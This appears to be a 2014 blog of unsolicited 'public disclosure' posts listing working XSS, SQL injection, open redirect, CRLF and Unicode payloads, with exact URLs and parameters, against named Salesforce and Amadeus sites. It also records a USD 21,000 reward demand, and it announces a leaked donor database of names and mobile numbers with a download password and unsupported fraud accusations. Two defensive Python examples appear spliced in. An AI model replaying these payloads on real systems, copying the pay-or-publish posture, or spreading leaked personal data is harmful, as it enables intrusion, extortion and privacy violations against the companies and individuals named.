Wednesday, January 22, 2014

Sales Force - Public Disclosure

Public Disclosure - SalesForce
They didn't reply to answer whether or not they would offer a bounty if I reported bugs to them under their Responsible Disclosure Policy. On their website, they say that they don't offer bug bounties and have no Hall of Fame. Can you believe it? No Hall of Fame!
Cross-site scripting & BREACH attack in 2 sub-domains of SalesForce.
1. Cross-site Scripting
a) Domain: appexchangejp.salesforce.com
PoC: https://appexchangejp.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_920358'():;WhiteHatMrNervous
Vulnerable Parameter: tab
b) Domain: appexchange.salesforce.com
PoC: https://appexchange.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_942833'():;WhiteHatMrNervous
Vulnerable Parameter: tab
2. BREACH attack
a) Domain: appexchange.salesforce.com
PoC: https://appexchange.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_938289
Vulnerable Parameter: tab
PoC Screenshots: http://www.mirrorupload.net/file/Z1QWL06L/#!SalesForce.zip

Tuesday, January 21, 2014

Amadeus IT Group - Public Disclosure

Public Disclosure - Amadeus IT Group
Download PoC & Conversation screenshots:-
Password for PDF: whiteHatMrNervous
Summary:
Date First Contacted: December 27, 2013
Reward demanded: USD 21,000
Any Reward Paid: No
Communication Channel: Company rep only conversed via blog comments, Gmail and Hotmail IDs; screenshots attached. Never used their official email, but traced the IP of the blog comment to Amadeus SAAS, FR
Vulnerability List: SQL Injection, Cross-site Scripting, HTTP Parameter Pollution, CRLF Injection, Open Redirect, Unicode transformation issues
Infected object: Main website & sub-domains
Retest Infection: Definitely will
Leaked database dump/files: None
Received Respect: No
Received Appreciation for Intimation about Existence of Security Vulnerabilities: No
Hall of Fame: No
Amadeus IT Group (your technology partner) – Transaction processor for the global travel and tourism industry.
Amadeus IT Group is the most used GDS (Global Distribution System; France based, Germany influenced) by Travel & Tour companies. Amadeus IT Group stores confidential client data in plain text on their servers. This data is stored and used by Travel & Tour companies that operate Amadeus GDS. Amadeus GDS has a feature called client profile, wherein each employee of the company can create/access/modify data of their company's clients. This data includes full name, date of birth, address, passport & visa details, and credit card numbers with PIN and expiry details. Their web service and GDS application are also vulnerable to stack overflow, remote code execution, etc. And their website is vulnerable to whatever is mentioned below. Amadeus IT Group is a virgin: it is known largely only by and within the Travel & Tour industry. Hence, Hat Hackers have never audited the security of Amadeus IT Group and its various products.
A] Cross Site Scripting (Amadeus XSS)
1. URL: amadeus.com/cgi-bin/appl/list.pl [GET]
Infected Parameters: 3 (whiteHatMrNervous reflected in returned source code)
?cat_nr=C97F6457-8274-43D5-8942-2C17F30D8DBA" onmouseover=prompt(whiteHatMrNervous) bad="
?job_nr=8F3C4897-6F62-40BE-83C2-A802C5AA201E--><ScRiPt>prompt(whiteHatMrNervous)</ScRiPt><!--
?loc_nr=6DC8EDF4-30C5-11D4-B90E-0050BAE619BE--><ScRiPt>prompt(whiteHatMrNervous)</ScRiPt><!--
2. URL: amadeus.com/linkhotel/nominate-hotel.html [POST (multipart) input]
Infected Parameters: 9 (whiteHatMrNervous reflected in returned source code)
?city=San Francisco" onmouseover=prompt(whiteHatMrNervous) bad="
?clients_corporations=1" onmouseover=prompt(whiteHatMrNervous) bad="
?company=MatchMeCupidCheatsFreelancers" onmouseover=prompt(whiteHatMrNervous) bad="
?email=SalesForce@hasXSS.com" onmouseover=prompt(whiteHatMrNervous) bad="
?first_name=AmadeusXSS" onmouseover=prompt(whiteHatMrNervous) bad="
?last_name=HackersParadise" onmouseover=prompt(whiteHatMrNervous) bad="
?rate_access_code=94102" onmouseover=prompt(whiteHatMrNervous) bad="
?telephone=555-666-0606" onmouseover=prompt(whiteHatMrNervous) bad="
?top_locations=1" onmouseover=prompt(whiteHatMrNervous) bad="
3. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp [GET]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?srchfor=0_978176%26quot;():;whiteHatMrNervous
4. URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp [GET]
Infected Parameters: 4 (whiteHatMrNervous reflected in returned source code)
?lastname=del"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
?postalcode=94102"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
?province=NY"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
?username=whiteHatMrNervous"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
5. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp [GET]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?start=1'sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad='>
6. URL: alc.amadeus.com/ilearn/en/learner/jsp/search_process.jsp [GET]
Infected Parameters: 4 (whiteHatMrNervous reflected in returned source code)
?btn=dosrch"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
?keywords=1"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
?srchfor=0'sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad='>
?wrd=1"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
7. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_validate.jsp [GET]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?nodetree=choosesite"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
B] SQL Injection
1. URL: amadeus.com/cgi-bin/appl/list.pl
Infected Parameters: 3
?cat_nr=1'"
?job_nr=1'"
?loc_nr=1'"
2. URL: myamadeus.net/homepage.aspx
Infected Parameters: 2
?ctl00%24txtPwd='+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+'
?ctl00%24txtUserid='+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+'
C] Open Redirect
1. URL: amadeus.com/corpweb/amaweb1camp.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
2. URL: amadeus.com/corpweb/eformstawfv2.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
3. URL: amadeus.com/corpweb/eformstowf.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
4. URL: amadeus.com/corpweb/hotelcampaignsen.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
5. URL: amadeus.com/corpweb/newsletters_cars_forms.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
6. URL: amadeus.com/corpweb/online_traveller_study_event.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
E] CRLF Injection
1. URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp
Infected Parameter: 1
?siteid=SomeCustomInjectedHeader:injected_by_whiteHatMrNervous
2. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp
Infected Parameter: 1
?start=SomeCustomInjectedHeader:injected_by_whiteHatMrNervous
3. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_validate.jsp
Infected Parameter: 1
?nodetree=SomeCustomInjectedHeader:injected_by_whiteHatMrNervous
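A defender-side check for the two classes listed in sections C] and E], added here as an example (not Amadeus code): a redirect value is accepted for a Location header only when it is a same-site path, and any value carrying CR/LF is refused so it cannot terminate the header and start an injected one. The sample inputs are constructed from the PoC patterns above; the function names are my own.

```python
from urllib.parse import urlsplit

def is_header_safe(value: str) -> bool:
    """True when the value has no CR/LF or other control characters,
    i.e. nothing that could end a header line and begin a new one
    (the SomeCustomInjectedHeader: pattern in section E])."""
    return all(ord(c) >= 0x20 and c != "\x7f" for c in value)

def redirect_rejection_reason(value):
    """Return None when value is an acceptable same-site path for a
    Location header, otherwise a short reason suitable for a log line."""
    if not value:
        return "empty"
    if not is_header_safe(value):
        return "control-characters"
    v = value.strip()
    # "//host" is protocol-relative; browsers also read "/\host" as "//host".
    if v.startswith(("//", "/\\", "\\")):
        return "protocol-relative-or-backslash"
    try:
        parts = urlsplit(v)
    except ValueError:
        return "unparseable"
    # Any scheme ("http:", "javascript:") or host takes the user off-site.
    if parts.scheme or parts.netloc:
        return "has-scheme-or-host"
    # Require an explicit site path so a bare "evil.example" is not accepted.
    if not v.startswith("/"):
        return "not-a-site-path"
    return None

def safe_redirect_target(value, default="/"):
    """Value to place in the Location header: the validated path or default."""
    return default if redirect_rejection_reason(value) else value.strip()

# Constructed inputs following the PoC patterns in sections C] and E].
SAMPLES = [
    "http://www.whiteHatMrNervous.blogspot.com",            # C]: absolute off-site URL
    "//www.whiteHatMrNervous.blogspot.com",                 # protocol-relative variant
    "/\\www.whiteHatMrNervous.blogspot.com",                # backslash variant
    "/corpweb/thanks.html\r\nSomeCustomInjectedHeader: x",  # E]: CRLF inside the value
    "/corpweb/thanks.html",                                 # legitimate same-site path
]

def triage(samples=SAMPLES):
    """Map each candidate to the reason it was rejected (None = accepted)."""
    return {s: redirect_rejection_reason(s) for s in samples}

if __name__ == "__main__":
    for s, reason in triage().items():
        print(repr(s), "->", reason or "accepted", "=>", safe_redirect_target(s))
```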
F] Unicode transformation issues
1. URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp
Infected Parameter: 1
?address1=whiteHatMrNervous9929%C0%BEz1%C0%BCz2a%90bcxyyy9929
2. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=pcjndrci&address1=acux9929>z1<z2a%EF%BF%BDbcxuca9929&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?city=whiteHatMrNervous1690%C0%BEz1%C0%BCz2a%90bcxyyy1690
3. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=tbewfsld&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=acux1690>z1<z2a%EF%BF%BDbcxuca1690&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?country=whiteHatMrNervous8949%C0%BEz1%C0%BCz2a%90bcxyyy8949
4. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=ldsbvqpp&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=acux8949>z1<z2a%EF%BF%BDbcxuca8949&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?familiarname=whiteHatMrNervous3871%C0%BEz1%C0%BCz2a%90bcxyyy3871
5. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=acux3871>z1<z2a%EF%BF%BDbcxuca3871&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?firstname=whiteHatMrNervous9454%C0%BEz1%C0%BCz2a%90bcxyyy9454
6. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=acux9454>z1<z2a%EF%BF%BDbcxuca9454&lastname=del&familiarname=ibxwwpis&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?Language=whiteHatMrNervous3664%C0%BEz1%C0%BCz2a%90bcxyyy3664
7. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=ndomggee&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=acux3664>z1<z2a%EF%BF%BDbcxuca3664&Activity=-1&site=Europe&nodetree=choosesite
?lastname=whiteHatMrNervous1260%C0%BEz1%C0%BCz2a%90bcxyyy1260
8. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=acux1260>z1<z2a%EF%BF%BDbcxuca1260&familiarname=ghdjqguv&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?postalcode=whiteHatMrNervous3683%C0%BEz1%C0%BCz2a%90bcxyyy3683
9. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=sngjchwn&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=acux3683>z1<z2a%EF%BF%BDbcxuca3683&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?province=whiteHatMrNervous9518%C0%BEz1%C0%BCz2a%90bcxyyy9518
10. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=jokctcch&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=acux9518>z1<z2a%EF%BF%BDbcxuca9518&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?site=whiteHatMrNervous9340%C0%BEz1%C0%BCz2a%90bcxyyy9340
11. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=iiaukhmo&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=acux9340>z1<z2a%EF%BF%BDbcxuca9340&nodetree=choosesite
?username=whiteHatMrNervous3710%C0%BEz1%C0%BCz2a%90bcxyyy3710
12. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous3710>z1<z2a%EF%BF%BDbcxyyy3710&firstname=del&lastname=del&familiarname=lfbykbbn&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
13. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp?start=whiteHatMrNervous9935%C0%BEz1%C0%BCz2a%90bcxyyy9935
14. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket.jsp?start=whiteHatMrNervous9935%3Ez1%3Cz2a%FDbcxyyy9935
15. URL: alc.amadeus.com/ilearn/en/learner/jsp/search_process.jsp?btn=whiteHatMrNervous2700%C0%BEz1%C0%BCz2a%90bcxyyy2700
16. URL: alc.amadeus.com/ilearn/en/learner/jsp/search_all.jsp?aor=0&btn=acux2700%C0%BEz1%C0%BCz2a%90bcxuca2700&cert=A&col=0&CompetencyId=&datechoice=S&daterng=1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?keywords=whiteHatMrNervous7201%C0%BEz1%C0%BCz2a%90bcxyyy7201
17. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=dosrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=acux7201%C0%BEz1%C0%BCz2a%90bcxuca7201&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?srchfor=whiteHatMrNervous5083%C0%BEz1%C0%BCz2a%90bcxyyy5083
18. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=advsrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=acux5083%C0%BEz1%C0%BCz2a%90bcxuca5083&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?wrd=whiteHatMrNervous4367%C0%BEz1%C0%BCz2a%90bcxyyy4367
19. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=dosrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=whiteHatMrNervous4367%C0%BEz1%C0%BCz2a%90bcxyyy4367
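To make the section F] findings concrete from the defender's side, here is an added example (not Amadeus code) that decodes a parameter as strict UTF-8 and records every malformed sequence, using a sample value constructed from the %C0%BE / %C0%BC / %90 pattern above. It also computes what a lenient decoder would turn an overlong pair into, which is what produces the > and < visible in the reflected URLs; the function names are my own.

```python
import codecs
from urllib.parse import unquote_to_bytes

# Constructed after the section F] pattern: overlong ">" (%C0%BE), overlong "<"
# (%C0%BC) and a lone continuation byte (%90) inside otherwise plain text.
SAMPLE_PARAM = "whiteHatMrNervous9929%C0%BEz1%C0%BCz2a%90bcxyyy9929"

OVERLONG_LEADS = {0xC0, 0xC1}  # two-byte leads that can only encode U+0000..U+007F

def overlong_value(lead: int, cont: int) -> str:
    """What a non-conforming decoder yields for an overlong two-byte sequence:
    the lead contributes no payload bits, so the continuation's 6 bits decide
    the character. This is how %C0%BE turns into ">" in the reflected pages."""
    return chr(((lead & 0x1F) << 6) | (cont & 0x3F))

def _recorder(findings):
    """Build a codecs error handler that logs each bad byte run and replaces
    it with U+FFFD, the same %EF%BF%BD the responses above contain."""
    def handler(err):
        bad = err.object[err.start:err.end]
        kind = "overlong-lead" if bad[0] in OVERLONG_LEADS else err.reason
        findings.append((err.start, bad.hex(), kind))
        return ("\ufffd", err.end)
    return handler

def decode_param(percent_encoded: str):
    """Percent-decode, then decode as strict UTF-8. Returns (text, findings):
    text has U+FFFD where malformed bytes were; findings lists each one as
    (offset, hex bytes, kind)."""
    raw = unquote_to_bytes(percent_encoded)
    findings = []
    codecs.register_error("record_utf8_errors", _recorder(findings))
    text = raw.decode("utf-8", errors="record_utf8_errors")
    return text, findings

def is_well_formed(percent_encoded: str) -> bool:
    """Input-validation gate: refuse the request when the raw bytes are not
    well-formed UTF-8 rather than letting a later layer 'repair' them."""
    return not decode_param(percent_encoded)[1]

if __name__ == "__main__":
    text, findings = decode_param(SAMPLE_PARAM)
    print(text)
    for offset, hexbytes, kind in findings:
        print(f"offset {offset}: {hexbytes} ({kind})")
    print("a lenient decoder would produce:",
          overlong_value(0xC0, 0xBE), overlong_value(0xC0, 0xBC))
```

Strict decoding never yields the angle brackets, so a filter that runs after it sees the same bytes the validator saw; the page's reflected URLs show the opposite order of operations.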

Monday, January 20, 2014

Nirmal Baba - Fraud

Target Audience – India [Closed, database+files shared publicly]
Download link for leaked files & database in excel:-
Password for zip: whiteHatMrNervous
Nirmal Baba / Nirmal Darbar / Nirmal Baba Samagam is nothing but a clever idea of a corrupt political party which is converting its black money to white money. In India, there are no taxes on donations. Hence the corrupt political party hired people to act as fake followers, in order to make the identity of Nirmal Baba famous. After the man gets the tag of a 'Baba', the corrupt political party starts depositing money in cash in the form of donations. In metro cities, everyone knows that 'Nirmal Baba' is a cheat and not a Baba; hence there is no real following, all paid & fake followers.
In September & October 2011, the fake Nirmal Baba got donations of more than INR 20,000,000. The corrupt political party is converting its black money into white at a very fast rate.
I have their database & will publish it on 30 Jan'14. Here is their DB structure for the table holding the donors' data:
phpMyAdmin SQL Dump v3.3.9
localhost:3306
Database: `payfee`
CREATE TABLE IF NOT EXISTS `pnboriginalpayfee` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `payfeeid` text,
  `name` text,
  `mobile` text,
  `purposecode` text,
  `purpose` text,
  `city_code` text,
  `samagam_city` text,
  `payment_mode` text,
  `amount` int(11) DEFAULT NULL,
  `submitdate` date DEFAULT NULL,
  `matchpayfee` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=10886;
The database shows they got donations from 10908 people or 10908 times from 27 Aug'11 – 25 Oct'11. Names & phone numbers do not correspond to each other; I have checked in the TrueCaller app. Hence, I can call them fake entries, real cash.

Friday, January 10, 2014

Sales Force - Vulnerability

[Closed, Vulnerabilities disclosed publicly]

Target Audience – Customers of SalesForce
SalesForce, a sub of Force, encourages security researchers to come forward and report bugs in their websites to them while also adhering to its Responsible Disclosure Policy.
But they offer no reward, no compensation for bug reporting. No hall of fame either. This creates disinterest among researchers and discourages them from reporting bugs; hence some sell them to hackers and some post them publicly.
As a customer of SalesForce, you should be aware that all your data online is not safe. I have found Cross-site scripting (XSS) bugs in multiple of their sub-domains & a BREACH attack.
I don't want anyone to exploit them, hence I will report to them after public disclosure. Either way, they will get the bug details.

Amadeus IT Group - Vulnerability

[Closed, Vulnerabilities disclosed publicly]
Target Audience - Travel & Tour Companies across the globe.
Surprisingly, your technology partner & GDS provider Amadeus is vulnerable to severe bugs like SQL injection (blind), Cross-site scripting, Open Redirect, CSRF, etc.
More interestingly, it doesn't want to know about the bugs nor fix them. Multiple of their websites are vulnerable.
JO* Jump Out, I have now started testing their GDS and web service for security vulnerabilities along with the ongoing search for bugs in their websites.
An exploiter may send an email to users of Amadeus GDS across the globe containing links that point to legitimate websites of Amadeus IT Group. When clicked, the user may be redirected to a phishing/malware site or something more creative, focused on stealing financial data. We can achieve this by exploiting the existing XSS, SQL Injection & Open Redirect vulnerabilities on any of their websites.